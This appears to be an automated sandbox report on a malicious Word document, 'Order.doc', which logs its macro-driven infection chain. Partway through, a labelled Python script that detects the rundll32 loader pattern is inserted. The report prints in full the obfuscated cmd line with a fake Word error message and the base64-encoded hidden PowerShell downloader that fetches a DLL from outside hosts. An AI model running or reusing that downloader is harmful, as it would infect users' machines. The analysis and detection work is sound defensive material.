                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: (repeated binary console buffers; decodable fragments: '...es are "Ssl3, Tls".' and 'At line:1 char:474')
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....l................#.............}..v.....m......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....s......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....t................#.............}..v.....u......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....{......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....|................#.............}..v.....}......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......K..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............8.8.'.+.'.V.'.).).`...............#.............}..v............0.N.............8G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....H.................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v....p ......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....(!................#.............}..v.....!......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....&......0.N.....................r.......|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....'................#.............}..v....0(......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....J`...............#.............}..v.....+......0.N.............8G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x,................#.............}..v.....,......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................v.j....E.h...............#.............}..v....@<......0.N...............`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................v.j....E.h...............#.............}..v.....z......0.N...............`.............|...............
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: Order.docVirustotal: Detection: 32%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdAD
gANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
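An added example, not part of the Joe Sandbox report and not code from the sample: detection logic in Python run over constructed process-creation events that carry the parent, image and command line of the rundll32 chain listed above (same module paths and entry-point names), plus one benign control. It parses the module and entry point the way rundll32 does (comma or whitespace separated) and flags the traits of this loader: an ordinal entry point (',#1', the case behind the "Suspicious Call by Ordinal" Sigma hit), a module whose extension is not .dll (.uvl, .lei), a module under the user profile, a module in a fresh subfolder of SysWOW64, a script-host parent, and rundll32 spawning rundll32. The second hop (System32\rundll32.exe starting SysWOW64\rundll32.exe for a 32-bit DLL) is the normal WoW64 relaunch, so that last check is a weak signal on its own; the combination within one chain is what distinguishes the loader. The event layout and the rule names are this example's own assumptions.

```python
"""Triage rundll32 process-creation events for the loader pattern seen in the chain above."""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # image path of the parent process
    image: str     # image path of the created process
    cmdline: str   # command line as logged


# Constructed events (our own field layout, not the sandbox's) carrying the parent, image
# and command line of five hops from the report's rundll32 chain, plus one benign control.
EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",      # 64-bit host relaunching a 32-bit DLL under WoW64
              r"C:\Windows\SysWOW64\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell"),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",   # benign control
              r"C:\Windows\System32\rundll32.exe printui.dll,PrintUIEntry /?"),
]

# rundll32 accepts either a comma or whitespace between the module and the entry point.
_MODULE_RE = re.compile(r"""^\s*(?:"[^"]*"|'[^']*'|\S+)\s+(?:"([^"]*)"|'([^']*)'|([^\s,]+))(?:[,\s]+(#?\w+))?""")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "winword.exe", "excel.exe"}


def parse_rundll32(cmdline: str):
    """Return (module, entry point) from a rundll32 command line, or (None, None)."""
    m = _MODULE_RE.match(cmdline)
    if not m:
        return None, None
    return m.group(1) or m.group(2) or m.group(3), m.group(4)


def evaluate(ev: ProcEvent) -> list:
    """Names of the checks the event trips.  Each is a weak signal on its own; it is the
    combination within one parent/child chain that distinguishes the loader."""
    hits = []
    if ntpath.basename(ev.image).lower() != "rundll32.exe":
        return hits
    module, entry = parse_rundll32(ev.cmdline)
    if module is None:
        return hits
    module_l, parent_name = module.lower(), ntpath.basename(ev.parent).lower()
    if entry and entry.startswith("#"):                          # cf. Sigma "Suspicious Call by Ordinal"
        hits.append("rundll32_ordinal_export")
    if ntpath.splitext(module_l)[1] not in (".dll", ".cpl", ".ocx", ".ax"):
        hits.append("rundll32_non_dll_extension")
    if module_l.startswith("c:\\users\\"):
        hits.append("rundll32_module_in_user_profile")
    if any(module_l.startswith(d) and "\\" in module_l[len(d):] for d in SYSTEM_DIRS):
        hits.append("rundll32_module_in_system_subdir")          # fresh folder dropped under System32/SysWOW64
    if parent_name in SCRIPT_HOSTS:
        hits.append("rundll32_from_script_or_office_host")
    if parent_name == "rundll32.exe":
        hits.append("rundll32_spawns_rundll32")                  # also fires on the legitimate WoW64 relaunch
    return hits


def triage(events) -> list:
    """Evaluate every event, returning (cmdline, hits) pairs in input order."""
    return [(ev.cmdline, evaluate(ev)) for ev in events]


if __name__ == "__main__":
    for cmdline, hits in triage(EVENTS):
        print(f"{len(hits)} {cmdline}\n    {', '.join(hits) or '-'}")
```

Run as a script it prints one line per event with the checks tripped; the benign printui call trips none, the WoW64 relaunch trips only the user-profile and spawn checks, and the hops that load the ordinal export or the renamed .uvl copy trip three each.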
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: Order.docStream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk
                      Obfuscated command line found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Suspicious powershell command line found
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBj